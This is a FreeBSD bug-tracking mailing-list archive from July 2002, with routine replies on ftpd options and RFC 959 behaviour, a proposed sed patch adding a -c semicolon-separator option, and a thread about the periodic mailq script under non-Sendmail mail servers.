bin/16705: ftpd doesn't support -h option Reply-To: Yar Tikhiy Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/16705; it has been noted by GNATS. From: Yar Tikhiy To: freebsd-gnats-submit@FreeBSD.org, kjm@rins.ryukoku.ac.jp, jontow@twcny.rr.com Cc: Subject: Re: bin/16705: ftpd doesn't support -h option Date: Tue, 30 Jul 2002 14:29:33 +0400 I'd like to include this feature to ftpd, but with a single change: Why to print host-specific info at all in this case? To my mind, it's better to omit it at all on the `-h' option, so paranoid admins can have a sound sleep :-) -- Yar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 3:52: 4 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 130EF37B400; Tue, 30 Jul 2002 03:52:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id BE7AD43E6E; Tue, 30 Jul 2002 03:52:01 -0700 (PDT) (envelope-from maxim@FreeBSD.org) Received: from freefall.freebsd.org (maxim@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UAq1JU040160; Tue, 30 Jul 2002 03:52:01 -0700 (PDT) (envelope-from maxim@freefall.freebsd.org) Received: (from maxim@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UAq1Sb040156; Tue, 30 Jul 2002 03:52:01 -0700 (PDT) Date: Tue, 30 Jul 2002 03:52:01 -0700 (PDT) From: Maxim Konovalov Message-Id: <200207301052.g6UAq1Sb040156@freefall.freebsd.org> To: qdung@hcmc.netnam.vn, maxim@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/41152: squid Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: squid State-Changed-From-To: open->closed State-Changed-By: maxim State-Changed-When: Tue Jul 30 03:51:30 PDT 2002 State-Changed-Why: An empty PR. http://www.freebsd.org/cgi/query-pr.cgi?pr=41152 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 4: 0:56 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CE5FE37B400; Tue, 30 Jul 2002 04:00:53 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4E37643E42; Tue, 30 Jul 2002 04:00:53 -0700 (PDT) (envelope-from maxim@FreeBSD.org) Received: from freefall.freebsd.org (maxim@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UB0rJU044959; Tue, 30 Jul 2002 04:00:53 -0700 (PDT) (envelope-from maxim@freefall.freebsd.org) Received: (from maxim@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UB0q5b044955; Tue, 30 Jul 2002 04:00:52 -0700 (PDT) Date: Tue, 30 Jul 2002 04:00:52 -0700 (PDT) From: Maxim Konovalov Message-Id: <200207301100.g6UB0q5b044955@freefall.freebsd.org> To: neologism@seznam.cz, maxim@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/41083: sound configuration Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sound configuration State-Changed-From-To: open->closed State-Changed-By: maxim State-Changed-When: Tue Jul 30 04:00:14 PDT 2002 State-Changed-Why: Duplicate of conf/39192. http://www.freebsd.org/cgi/query-pr.cgi?pr=41083 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 4:30: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0D1CE37B400 for ; Tue, 30 Jul 2002 04:30:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8B72D43E67 for ; Tue, 30 Jul 2002 04:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UBU3JU051939 for ; Tue, 30 Jul 2002 04:30:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UBU3HK051938; Tue, 30 Jul 2002 04:30:03 -0700 (PDT) Date: Tue, 30 Jul 2002 04:30:03 -0700 (PDT) Message-Id: <200207301130.g6UBU3HK051938@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Yar Tikhiy Subject: Re: bin/24757: ftpd not RFC compliant Reply-To: Yar Tikhiy Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/24757; it has been noted by GNATS. From: Yar Tikhiy To: freebsd-gnats-submit@FreeBSD.org, toasty@dragondata.com Cc: Subject: Re: bin/24757: ftpd not RFC compliant Date: Tue, 30 Jul 2002 15:20:23 +0400 I believe there is a typo in RFC 959 there. The 250 responce cannot mean "Transfer started" since it should be issued after a transfer has been *finished* (without closing the data connection.) I'm almost sure it must be the 150 responce there. The FreeBSD ftpd has went even further, including the unique name into both leading (150) and trailing (226, transfer finished and data channel closed) responces. Thus I think this PR can be closed if you don't mind. -- Yar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 4:40: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E77FE37B400 for ; Tue, 30 Jul 2002 04:40:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 938F643E5E for ; Tue, 30 Jul 2002 04:40:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UBe4JU052703 for ; Tue, 30 Jul 2002 04:40:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UBe4uf052701; Tue, 30 Jul 2002 04:40:04 -0700 (PDT) Date: Tue, 30 Jul 2002 04:40:04 -0700 (PDT) Message-Id: <200207301140.g6UBe4uf052701@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Yar Tikhiy Subject: Re: bin/36189: [ftpd] it can not send a file on NTFS in binary correct!! Reply-To: Yar Tikhiy Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/36189; it has been noted by GNATS. From: Yar Tikhiy To: semenu@FreeBSD.org Cc: freebsd-gnats-submit@FreeBSD.org, tcs@cyber.cs.ntou.edu.tw Subject: Re: bin/36189: [ftpd] it can not send a file on NTFS in binary correct!! Date: Tue, 30 Jul 2002 15:34:23 +0400 Hi Semen, Could you take a look at this PR? I believe there were problems with sendfile(2) on NTFS. -- Yar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 5:50:24 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4C4FD37B400 for ; Tue, 30 Jul 2002 05:50:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6553843E5E for ; Tue, 30 Jul 2002 05:50:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UCo3JU066789 for ; Tue, 30 Jul 2002 05:50:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UCo3Y6066788; Tue, 30 Jul 2002 05:50:03 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4ED0337B405 for ; Tue, 30 Jul 2002 05:40:43 -0700 (PDT) Received: from smtp.noos.fr (claudel.noos.net [212.198.2.83]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8349443E67 for ; Tue, 30 Jul 2002 05:40:41 -0700 (PDT) (envelope-from root@gits.dyndns.org) Received: (qmail 36762977 invoked by uid 0); 30 Jul 2002 12:40:39 -0000 Received: from unknown (HELO gits.gits.dyndns.org) ([212.198.229.153]) (envelope-sender ) by 212.198.2.83 (qmail-ldap-1.03) with SMTP for ; 30 Jul 2002 12:40:39 -0000 Received: from gits.gits.dyndns.org (liharbv08t3mp5yw@localhost [127.0.0.1]) by gits.gits.dyndns.org (8.12.5/8.12.5) with ESMTP id g6UCeYq4040005; Tue, 30 Jul 2002 14:40:34 +0200 (CEST) (envelope-from root@gits.dyndns.org) Received: (from root@localhost) by gits.gits.dyndns.org (8.12.5/8.12.5/Submit) id g6UCeXLo040004; Tue, 30 Jul 2002 14:40:33 +0200 (CEST) (envelope-from root) Message-Id: <200207301240.g6UCeXLo040004@gits.gits.dyndns.org> Date: Tue, 30 Jul 2002 14:40:33 +0200 (CEST) From: Cyrille Lefevre Reply-To: Cyrille Lefevre To: FreeBSD-gnats-submit@FreeBSD.org Cc: "Tim J. Robbins" X-Send-Pr-Version: 3.113 Subject: bin/41159: new sed -c option to allow ; as a separator for b, t and : functions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41159 >Category: bin >Synopsis: new sed -c option to allow ; as a separator for b, t and : functions >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Jul 30 05:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Cyrille Lefevre >Release: FreeBSD 4.6-STABLE i386 >Organization: ACME >Environment: System: FreeBSD gits 4.6-STABLE FreeBSD 4.6-STABLE #21: Sun Jul 28 09:42:24 CEST 2002 root@gits:/disk2/freebsd/stable/src/sys/compile/CUSTOM i386 >Description: the current sed implementation can't handle the ; separator for b, t and : functions. this patch set add a new -c (compat) option to allow sed to parse such constructions. maybe -C is better then -c ? >How-To-Repeat: fetch http://queen.rett.polimi.it/~paolob/seders/scripts/sokoban.sed sed -f sokoban.sed sed: 2266: /root/sokoban.sed: unexpected EOF (pending }'s) sed -cf sokoban.sed (weel, it doesn't work yet, but at least, it can be parsed :) >Fix: Index: compile.c =================================================================== RCS file: /home/ncvs/src/usr.bin/sed/compile.c,v retrieving revision 1.13.2.7 diff -u -r1.13.2.7 compile.c --- compile.c 17 Jul 2002 09:35:56 -0000 1.13.2.7 +++ compile.c 30 Jul 2002 12:08:25 -0000 @@ -76,7 +76,7 @@ static char *compile_tr(char *, char **); static struct s_command **compile_stream(struct s_command **); -static char *duptoeol(char *, const char *); +static char *duptoeol(char **, const char *, int); static void enterlabel(struct s_command *); static struct s_command *findlabel(char *); @@ -274,39 +274,43 @@ case WFILE: /* w */ p++; EATSPACE(); - if (*p == '\0') + cmd->t = duptoeol(&p, "w command", 0); + if (cmd->t == NULL) errx(1, "%lu: %s: filename expected", linenum, fname); - cmd->t = duptoeol(p, "w command"); if (aflag) cmd->u.fd = -1; - else if ((cmd->u.fd = open(p, + else if ((cmd->u.fd = open(cmd->t, O_WRONLY|O_APPEND|O_CREAT|O_TRUNC, DEFFILEMODE)) == -1) - err(1, "%s", p); + err(1, "%s", cmd->t); break; case RFILE: /* r */ p++; EATSPACE(); - if (*p == '\0') + cmd->t = duptoeol(&p, "read command", 0); + if (cmd->t == NULL) errx(1, "%lu: %s: filename expected", linenum, fname); - else - cmd->t = duptoeol(p, "read command"); break; case BRANCH: /* b t */ p++; EATSPACE(); - if (*p == '\0') - cmd->t = NULL; - else - cmd->t = duptoeol(p, "branch"); + cmd->t = duptoeol(&p, "branch", 1); + if (*p == ';') { + p++; + goto semicolon; + } break; case LABEL: /* : */ p++; EATSPACE(); - cmd->t = duptoeol(p, "label"); - if (strlen(p) == 0) + cmd->t = duptoeol(&p, "label", 1); + if (cmd->t == NULL) errx(1, "%lu: %s: empty label", linenum, fname); enterlabel(cmd); + if (*p == ';') { + p++; + goto semicolon; + } break; case SUBST: /* s */ p++; @@ -738,27 +742,36 @@ /* * duptoeol -- - * Return a copy of all the characters up to \n or \0. + * Return a copy of all the characters up to \n or \0 and maybe `;'. */ static char * -duptoeol(s, ctype) - char *s; +duptoeol(sp, ctype, semi) + char **sp; const char *ctype; + int semi; { size_t len; int ws; - char *p, *start; + char *p, *start, *s; + char c; + c = semi && cflag ? ';' : '\0'; ws = 0; - for (start = s; *s != '\0' && *s != '\n'; ++s) + for (start = s = *sp; *s != '\0' && *s != '\n' && *s != c; ++s) ws = isspace((unsigned char)*s); - *s = '\0'; + *sp = s; + if (*s != c) + *s = '\0'; + if (start == s) + return (NULL); if (ws) warnx("%lu: %s: whitespace after %s", linenum, fname, ctype); len = s - start + 1; if ((p = malloc(len)) == NULL) err(1, "malloc"); - return (memmove(p, start, len)); + s = memmove(p, start, len); + s [len-1] = '\0'; + return (s); } /* Index: extern.h =================================================================== RCS file: /home/ncvs/src/usr.bin/sed/extern.h,v retrieving revision 1.3.6.4 diff -u -r1.3.6.4 extern.h --- extern.h 17 Jul 2002 09:35:56 -0000 1.3.6.4 +++ extern.h 30 Jul 2002 01:59:12 -0000 @@ -45,6 +45,7 @@ extern u_long linenum; extern int appendnum; extern int aflag, eflag, nflag; +extern int cflag; extern const char *fname; extern int rflags; /* regex flags to use */ Index: main.c =================================================================== RCS file: /home/ncvs/src/usr.bin/sed/main.c,v retrieving revision 1.9.2.6 diff -u -r1.9.2.6 main.c --- main.c 17 Jul 2002 09:35:56 -0000 1.9.2.6 +++ main.c 30 Jul 2002 01:59:12 -0000 @@ -99,6 +99,7 @@ static FILE *curfile; /* Current open file */ int aflag, eflag, nflag; +int cflag; /* allow ; to behave as \n for b and t */ int rflags = 0; static int rval; /* Exit status */ @@ -128,7 +129,7 @@ fflag = 0; inplace = NULL; - while ((c = getopt(argc, argv, "Eae:f:i:n")) != -1) + while ((c = getopt(argc, argv, "Eace:f:i:n")) != -1) switch (c) { case 'E': rflags = REG_EXTENDED; @@ -136,6 +137,9 @@ case 'a': aflag = 1; break; + case 'c': + cflag = 1; + break; case 'e': eflag = 1; if ((temp_arg = malloc(strlen(optarg) + 2)) == NULL) @@ -186,8 +190,8 @@ usage() { (void)fprintf(stderr, "%s\n%s\n", - "usage: sed script [-Ean] [-i extension] [file ...]", - " sed [-an] [-i extension] [-e script] ... [-f script_file] ... [file ...]"); + "usage: sed script [-Eacn] [-i extension] [file ...]", + " sed [-acn] [-i extension] [-e script] ... [-f script_file] ... [file ...]"); exit(1); } Index: sed.1 =================================================================== RCS file: /home/ncvs/src/usr.bin/sed/sed.1,v retrieving revision 1.9.2.9 diff -u -r1.9.2.9 sed.1 --- sed.1 27 Jun 2002 13:03:33 -0000 1.9.2.9 +++ sed.1 30 Jul 2002 11:41:57 -0000 @@ -43,11 +43,11 @@ .Nd stream editor .Sh SYNOPSIS .Nm -.Op Fl Ean +.Op Fl Eacn .Ar command .Op Ar .Nm -.Op Fl Ean +.Op Fl Eacn .Op Fl e Ar command .Op Fl f Ar command_file .Op Fl i Ar extension @@ -89,6 +89,17 @@ to delay opening each file until a command containing the related .Dq w function is applied to a line of input. +.It Fl c +Compatible mode to allow the +.Dq \&; +command separator for +.Dq b , +.Dq t +and +.Dq \&: +functions instead of reading the +.Em label +until the eof of line. .It Fl e Ar command Append the editing commands specified by the .Ar command >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 7:52:27 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1935737B400 for ; Tue, 30 Jul 2002 07:52:25 -0700 (PDT) Received: from altair.mukappabeta.net (altair.mukappabeta.net [194.145.150.157]) by mx1.FreeBSD.org (Postfix) with ESMTP id D267C43E42 for ; Tue, 30 Jul 2002 07:52:23 -0700 (PDT) (envelope-from mkb@mukappabeta.net) Received: from mukappabeta.net (localhost [127.0.0.1]) by altair.mukappabeta.net (Postfix) with ESMTP id E2618733; Tue, 30 Jul 2002 16:53:14 +0200 (CEST) Message-ID: <3D46A85A.8090609@mukappabeta.net> Date: Tue, 30 Jul 2002 16:53:14 +0200 From: Matthias Buelow User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020608 X-Accept-Language: de-de, en, en-us MIME-Version: 1.0 To: Peter Pentchev Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/41012: /etc/periodic/daily/440.status-mailq assumes sendmail References: <200207290740.g6T7e31g091006@freefall.freebsd.org> <3D454B81.2050405@mukappabeta.de> <20020730071817.GC2549@straylight.oblivion.bg> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Peter Pentchev wrote: >I think the currently available periodic scripts are tailored for >a default installation; that is, they make it so a novice user reaps >all the benefits of the software installed with the system (with Sendmail >as the default MTA) with no need to tweak any knobs. Administrators >who install other MTA's should arguably be prepared to tweak the system >startup scripts a bit :) > > > Yah well. One might also argue that the relevant port install procedure could spit out a message about which scripts or configs the administrator ought to have an eye on... this falls into the port's maintainer's domain, though. Although I'm still convinced that the system scripts should be rather spartanic than over-featured. --mkb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 8: 7:46 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 02A0037B400 for ; Tue, 30 Jul 2002 08:07:42 -0700 (PDT) Received: from south.nanolink.com (south.nanolink.com [217.75.134.10]) by mx1.FreeBSD.org (Postfix) with SMTP id 6B42743E4A for ; Tue, 30 Jul 2002 08:07:40 -0700 (PDT) (envelope-from roam@ringlet.net) Received: (qmail 13763 invoked by uid 85); 30 Jul 2002 15:22:35 -0000 Received: from sbnd.online.bg (HELO straylight.ringlet.net) (217.75.129.196) by south.nanolink.com with SMTP; 30 Jul 2002 15:22:34 -0000 Received: (qmail 3504 invoked by uid 1000); 30 Jul 2002 15:07:10 -0000 Date: Tue, 30 Jul 2002 18:07:10 +0300 From: Peter Pentchev To: Matthias Buelow Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/41012: /etc/periodic/daily/440.status-mailq assumes sendmail Message-ID: <20020730150710.GA382@straylight.oblivion.bg> Mail-Followup-To: Matthias Buelow , freebsd-bugs@FreeBSD.org References: <200207290740.g6T7e31g091006@freefall.freebsd.org> <3D454B81.2050405@mukappabeta.de> <20020730071817.GC2549@straylight.oblivion.bg> <3D46A85A.8090609@mukappabeta.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="XsQoSWH+UP9D9v3l" Content-Disposition: inline In-Reply-To: <3D46A85A.8090609@mukappabeta.net> User-Agent: Mutt/1.5.1i X-Virus-Scanned: by Nik's Monitoring Daemon (AMaViS perl-11d ) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --XsQoSWH+UP9D9v3l Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 30, 2002 at 04:53:14PM +0200, Matthias Buelow wrote: > Peter Pentchev wrote: >=20 > >I think the currently available periodic scripts are tailored for > >a default installation; that is, they make it so a novice user reaps > >all the benefits of the software installed with the system (with Sendmail > >as the default MTA) with no need to tweak any knobs. Administrators > >who install other MTA's should arguably be prepared to tweak the system > >startup scripts a bit :) > > > >=20 > > > Yah well. One might also argue that the relevant port install procedure= =20 > could spit > out a message about which scripts or configs the administrator ought to= =20 > have an eye > on... this falls into the port's maintainer's domain, though. Although= =20 > I'm still convinced > that the system scripts should be rather spartanic than over-featured. And then again.. the default scripts, with the default settings, *are* indeed spartan. The way I read the 440.status-mailq script, the -Ac parameters are *only* passed when the daily_status_mailq_shorten variable is set to 'YES'. The default value for that variable is 'NO', so the default for the status-mailq script would be to invoke mailq with absolutely no parameters, which should be compatible with all MTA's. The reason you are seeing that problem is that you have tweaked the default settings by explicitly requesting shortened mailq output :) G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 This sentence contains exactly threee erors. --XsQoSWH+UP9D9v3l Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9Rque7Ri2jRYZRVMRAug5AJ0c7ZGQJNzBBoz8eiAPGIcHzR2E0gCfTN1p 3lf49bj3weBmIsqcZHEgMhs= =1Uv1 -----END PGP SIGNATURE----- --XsQoSWH+UP9D9v3l-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 8:10:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8B7D637B405 for ; Tue, 30 Jul 2002 08:10:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id D8E4B43E77 for ; Tue, 30 Jul 2002 08:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UFA2JU097122 for ; Tue, 30 Jul 2002 08:10:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UFA2hv097121; Tue, 30 Jul 2002 08:10:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5856D37B401 for ; Tue, 30 Jul 2002 08:00:40 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id E2F7343E84 for ; Tue, 30 Jul 2002 08:00:38 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UF0cOT019861 for ; Tue, 30 Jul 2002 08:00:38 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6UF0ckv019860; Tue, 30 Jul 2002 08:00:38 -0700 (PDT) Message-Id: <200207301500.g6UF0ckv019860@www.freebsd.org> Date: Tue, 30 Jul 2002 08:00:38 -0700 (PDT) From: Bang Jun-Young To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41164: New bsd-family-tree from NetBSD Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41164 >Category: misc >Synopsis: New bsd-family-tree from NetBSD >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Jul 30 08:10:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Bang Jun-Young >Release: ? >Organization: NetBSD Project >Environment: >Description: Days ago I sent new bsd-family-tree to wosch@freebsd.org but he still hasn't replied. >How-To-Repeat: >Fix: Reflect changes from ftp://ftp.netbsd.org/pub/NetBSD-current/src/share/misc/bsd-family-tree to FreeBSD version. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 8:38: 9 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 31A5A37B400 for ; Tue, 30 Jul 2002 08:38:08 -0700 (PDT) Received: from reiher.informatik.uni-wuerzburg.de (wi4d22.informatik.uni-wuerzburg.de [132.187.101.122]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7FA3743E6A for ; Tue, 30 Jul 2002 08:38:07 -0700 (PDT) (envelope-from mkb@mukappabeta.de) Received: from mukappabeta.de (localhost [127.0.0.1]) by reiher.informatik.uni-wuerzburg.de (Postfix) with ESMTP id E489BAF35; Tue, 30 Jul 2002 17:38:05 +0200 (CEST) Message-ID: <3D46B2DD.6070809@mukappabeta.de> Date: Tue, 30 Jul 2002 17:38:05 +0200 From: Matthias Buelow User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020607 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Peter Pentchev Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/41012: /etc/periodic/daily/440.status-mailq assumes sendmail References: <200207290740.g6T7e31g091006@freefall.freebsd.org> <3D454B81.2050405@mukappabeta.de> <20020730071817.GC2549@straylight.oblivion.bg> <3D46A85A.8090609@mukappabeta.net> <20020730150710.GA382@straylight.oblivion.bg> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Peter Pentchev wrote: > And then again.. the default scripts, with the default settings, *are* > indeed spartan. The way I read the 440.status-mailq script, the -Ac > parameters are *only* passed when the daily_status_mailq_shorten > variable is set to 'YES'. The default value for that variable is 'NO', > so the default for the status-mailq script would be to invoke mailq with > absolutely no parameters, which should be compatible with all MTA's. > The reason you are seeing that problem is that you have tweaked the > default settings by explicitly requesting shortened mailq output :) I don't want to prolong this rather silly discussion and I'm not particularly pedantic but the problem is with the daily_status_include_submit_mailq variable (which is set to YES in defaults/periodic.conf), not with the daily_status_mailq_shorten option... JFYI. After I found out about periodic.conf (actually I have to admit I didn't know about it when I sent the PR) and that the problematic check can be switched off with it, the PR could be closed... would be nice, tho, if the blahblah_submit_mailq thing would be "NO" by default or the postfix port issue a message upon installation to inform one where to look for necessary changes (something like "have a look at periodic.conf for sendmail-specific mailq checks" would be ok.) --mkb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 11: 0:32 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C6D0437B400 for ; Tue, 30 Jul 2002 11:00:10 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1BB7E43E4A for ; Tue, 30 Jul 2002 11:00:10 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UI09JU026808 for ; Tue, 30 Jul 2002 11:00:09 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id 